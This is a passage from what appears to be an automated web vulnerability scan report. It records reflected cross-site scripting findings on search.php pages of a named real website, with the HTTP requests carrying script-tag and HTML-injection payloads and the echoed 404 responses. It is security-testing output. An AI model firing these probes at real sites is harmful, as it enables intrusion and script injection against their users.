User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3f5f0<a>370a8541ac1&opt=2 was not found on this server.</p>
...[SNIP]...

2.674. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f5ff<a>503a40fec2f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...8f5ff<a>503a40fec2f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...8f5ff<a>503a40fec2f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.675. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dafd3<script>alert(1)</script>afd3248270a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&dafd3<script>alert(1)</script>afd3248270a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&dafd3<script>alert(1)</script>afd3248270a=1 was not found on this server.</p>
...[SNIP]...

2.676. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cb132<a>41b33f4749c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cb132<a>41b33f4749c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cb132<a>41b33f4749c was not found on this server.</p>
...[SNIP]...

2.677. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3c7c7<script>alert(1)</script>3f0f6329dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3c7c7<script>alert(1)</script>3f0f6329dbf/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3c7c7<script>alert(1)</script>3f0f6329dbf/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.678. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed6fa<script>alert(1)</script>27a9b78a83e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contented6fa<script>alert(1)</script>27a9b78a83e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contented6fa<script>alert(1)</script>27a9b78a83e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.679. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9d4f<script>alert(1)</script>fa17d1e2542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesb9d4f<script>alert(1)</script>fa17d1e2542/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesb9d4f<script>alert(1)</script>fa17d1e2542/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.680. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fc270<script>alert(1)</script>02a105aedfb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosfc270<script>alert(1)</script>02a105aedfb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosfc270<script>alert(1)</script>02a105aedfb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.681. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e9f0<script>alert(1)</script>a62f8734f4d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/search.php5e9f0<script>alert(1)</script>a62f8734f4d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php5e9f0<script>alert(1)</script>a62f8734f4d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.682. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 74c45<a>9ee43b19e1b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search74c45<a>9ee43b19e1b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search74c45<a>9ee43b19e1b&opt=2 was not found on this server.</p>
...[SNIP]...

2.683. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5703b<a>e5991ea0072 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...5703b<a>e5991ea0072&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...5703b<a>e5991ea0072&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.684. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d759a<script>alert(1)</script>c713687eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&d759a<script>alert(1)</script>c713687eb5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&d759a<script>alert(1)</script>c713687eb5=1 was not found on this server.</p>
...[SNIP]...

2.685. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c191e<a>74f75dd73c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c191e<a>74f75dd73c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c191e<a>74f75dd73c6 was not found on this server.</p>
...[SNIP]...

2.686. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 253bd<script>alert(1)</script>11a958de63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication253bd<script>alert(1)</script>11a958de63d/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication253bd<script>alert(1)</script>11a958de63d/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.687. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7a1e3<script>alert(1)</script>cb45f40c2d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content7a1e3<script>alert(1)</script>cb45f40c2d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content7a1e3<script>alert(1)</script>cb45f40c2d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.688. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78693<script>alert(1)</script>590c3bd89f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes78693<script>alert(1)</script>590c3bd89f7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes78693<script>alert(1)</script>590c3bd89f7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.689. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e2f5<script>alert(1)</script>a3759d323f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/search.php7e2f5<script>alert(1)</script>a3759d323f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php7e2f5<script>alert(1)</script>a3759d323f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.690. http://www.resellerbase.com/communication/mobile-content/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 54cf1<a>37eeec796da was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search54cf1<a>37eeec796da&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search54cf1<a>37eeec796da&opt=2 was not found on this server.</p>
...[SNIP]...

